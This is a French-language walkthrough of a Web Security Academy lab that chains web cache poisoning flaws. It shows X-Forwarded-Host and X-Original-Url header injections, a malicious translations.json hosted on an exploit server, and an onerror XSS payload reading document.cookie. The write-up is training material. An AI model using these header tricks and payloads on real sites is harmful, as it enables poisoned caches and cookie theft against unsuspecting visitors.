Combinaison de vulnérabilités de web cache poisoning

Combining web cache poisoning vulnerabilities

Lab: Combining web cache poisoning vulnerabilities | Web Security AcademyWebSecAcademy

On doit empoisonner le cache de la page d’accueil avec une version qui exécute alert(document.cookie) dans le navigateur du visiteur. La victime passe sur / environ toutes les minutes et sa langue est l’anglais (cookie lang=en).

1) Point d’entrée : la fonctionnalité de traduction côté client

Sur la page d’accueil, on observe :

Une cookie lang (ex. lang=es) + session=...
Un script de traduction : /resources/js/translations.js

Cookie: lang=es; session=3AJsSQlcvMWoyYAD7DAbxUISdsu1rIFg

function initTranslations(jsonUrl)
{
    const lang = document.cookie.split(';')
        .map(c => c.trim().split('='))
        .filter(p => p[0] === 'lang')
        .map(p => p[1])
        .find(() => true);

    const translate = (dict, el) => {
        for (const k in dict) {
            if (el.innerHTML === k) {
                el.innerHTML = dict[k];
            } else {
                el.childNodes.forEach(el_ => translate(dict, el_));
            }
        }
    }

    fetch(jsonUrl)
        .then(r => r.json())
        .then(j => {
            const select = document.getElementById('lang-select');
            if (select) {
                for (const code in j) {
                    const name = j[code].name;
                    const el = document.createElement("option");
                    el.setAttribute("value", code);
                    el.innerText = name;
                    select.appendChild(el);
                    if (code === lang) {
                        select.selectedIndex = select.childElementCount - 1;
                    }
                }
            }

            lang in j && lang.toLowerCase() !== 'en' && j[lang].translations && translate(j[lang].translations, document.getElementsByClassName('maincontainer')[0]);
        });
}

Ce script lit lang depuis les cookies, puis fait un fetch() vers un JSON :

{
    "en": {
        "name": "English"
    },
    "es": {
        "name": "español",
        "translations": {
            "Return to list": "Volver a la lista",
            "View details": "Ver detailes",
            "Description:": "Descripción:"
        }
    },
    "cn": {
        "name": "中文",
        "translations": {
            "Return to list": "返回清單",
            "View details": "查看詳情",
            "Description:": "描述:"
        }
    },
    "ar": {
        "name": "عربى",
        "translations": {
            "Return to list": "العودة إلى القائمة",
            "View details": "عرض التفاصيل",
            "Description:": "وصف:"
        }
    },
    "en-gb": {
        "name": "Proper English",
        "translations": {
            "Return to list": "From whence you came",
            "View details": "Do me the honour of elaborating",
            "Description:": "Pontifications on the subject matter:"
        }
    },
    "ml": {
        "name": "മലയാളം",
        "translations": {
            "Return to list": "ലിസ്റ്റിലേക്ക് മടങ്ങുക",
            "View details": "വിശദാംശങ്ങൾ കാണുക",
            "Description:": "വിവരണം:"
        }
    },
    "hb": {
        "name": "עברית",
        "translations": {
            "Return to list": "חזור לרשימה",
            "View details": "הצג פרטים",
            "Description:": "תיאור:"
        }
    },
    "zl": {
        "name": "Ẕ̻͕̿̊ͤ̍ͅa͙l̗ͧg̮̤̰̘͇ȍ͇͕̳̙͙͉́̅̋̌̅",
        "translations": {
            "Return to list": "Re̹̰̘͉̹̪ͅt̬̫̜ȕͩ͒ͥͥr̃̉͒n ̎͂t͎͖̽͋o͖̟͚͙̲͐ͤͫ̎̓ ̼̟͈̭͉͎̂ͯ̔ͤͤ̏͐ͅliͤ͑ͧ̆̐̈̀sṭ̠̮̰͍̙͒̔͆̈ͤ̅",
            "View details": "V̖̮͙ͅi͇e͙̦w̭̣̫͇̦̬̰ ̓͑̓ͯ̔d͍͂e͚̮͖͍͖̠͙ͮͭ̉ͦ̏͌̆t̙͎̺͉a̳̖͔̱͉̱͑̆̌̃͊ͬi̯͚͙̼̹̮l̖͎͛̈́͒ͅs̒̒ͤ̽̒̀",
            "Description:": "D̳͔e̝ͩ̐ͅsc̗̱̼̤̬̎̓ͪͣͭ̐ͅr̪̝͖̙̱̄̓͌̓̚ip̭̦̭̰̻ͣ̓̽ͨ̚ț̤̝̻i̹̱̟̞͕̓̓ͬ̓ͬ̆ͅon̠͚͕̈́̋̓:"
        }
    },
    "fn": {
        "name": "Suomalainen",
        "translations": {
            "Return to list": "Palaa luetteloon",
            "View details": "Näytä kuvaus",
            "Description:": "Kuvaus:"
        }
    },
    "hw": {
        "name": "Ōlelo Hawaiʻi",
        "translations": {
            "Return to list": "Hoʻi i ka papa inoa",
            "View details": "E nānā i nā kikoʻī",
            "Description:": "ʻO keʻano:"
        }
    },
    "mm": {
        "name": "ဗမာ",
        "translations": {
            "Return to list": "စာရင်းသို့ပြန်သွားသည်",
            "View details": "အသေးစိတ်ကြည့်ရန်",
            "Description:": "ဖော်ပြချက်:"
        }
    }
}

Et data.host vient d’un bloc inline sur la home :

<script>
     data = {"host":"0acc008b046bd245809803b8002b0061.web-security-academy.net","path":"/"}
</script>

Puis le script applique les traductions en remplaçant du texte via innerHTML, ce qui est important car ça peut transformer une “traduction” en injection HTML si on contrôle le JSON.

Vulnérabilité n°1 : manipulation du host via `X-Forwarded-Host`

En ajoutant l’en-tête HTTP suivant

X-Forwarded-Host: test.com

nous constatons que la valeur est reflétée dans data.host.

<script>
    initTranslations('//' + data.host + '/resources/json/translations.json');
</script>

Nous pouvons donc forcer le navigateur à charger le fichier :

/resources/json/translations.json

3. Vulnérabilité n°2 : XSS via le fichier de traduction JSON

Nous hébergeons sur l’exploit server un faux translations.json contenant une injection XSS dans une traduction, par exemple :

{
    "en": {
        "name": "English"
    },
    "es": {
        "name": "español",
        "translations": {
            "Return to list": "Hola",
            "View details": "></a><img src=0 onerror=alert(document.cookie)>",
            "Description:": "Descripción:"
        }
    }
}

Nous utilisons alors :

X-Forwarded-Host: exploit-0a19004104f2d29e80b40256011c00b0.exploit-server.net/

La page d’accueil, servie depuis le cache, pointera désormais vers notre fichier JSON malveillant.

Le contenu de la traduction est donc interprété comme du HTML, ce qui permet l’exécution du JavaScript injecté.

4. Limitation : la victime utilise la langue anglaise

Le script de traduction ne s’exécute que si :

lang !== 'en'

Or, la victime a initialement lang=en. Même si nous contrôlons le fichier JSON, l’XSS ne se déclenche pas tant que la langue n’est pas modifiée.

Nous devons donc forcer le passage en espagnol.

5. Vulnérabilité n°3 : forcer le changement de langue via `X-Original-Url`

À l’aide de Param Miner, nous identifions l’en-tête vulnérable :

X-Original-Url: /test

Nous envoyons une autre requête vers / avec :

X-Original-Url: /test → 404 Not Found

Le cache sert une réponse qui définit lang=es pour les visiteurs.

X-Original-Url: /setlang\es

X-Original-Url: /setlang\es → 302 Found

Cette route :

Définit la cookie lang=es
Redirige ensuite vers la page d’accueil

Exécution du payload chez la victime

La victime visite /
La cookie lang passe à es
La page recharge le fichier translations.json depuis notre exploit server
La traduction malveillante est injectée dans le DOM
Le navigateur exécute :

Mis à jour il y a 2 mois

hashtagCombining web cache poisoning vulnerabilities

hashtag1) Point d’entrée : la fonctionnalité de traduction côté client

hashtagVulnérabilité n°1 : manipulation du host via X-Forwarded-Host

hashtag3. Vulnérabilité n°2 : XSS via le fichier de traduction JSON

hashtag4. Limitation : la victime utilise la langue anglaise

hashtag5. Vulnérabilité n°3 : forcer le changement de langue via X-Original-Url

hashtagExécution du payload chez la victime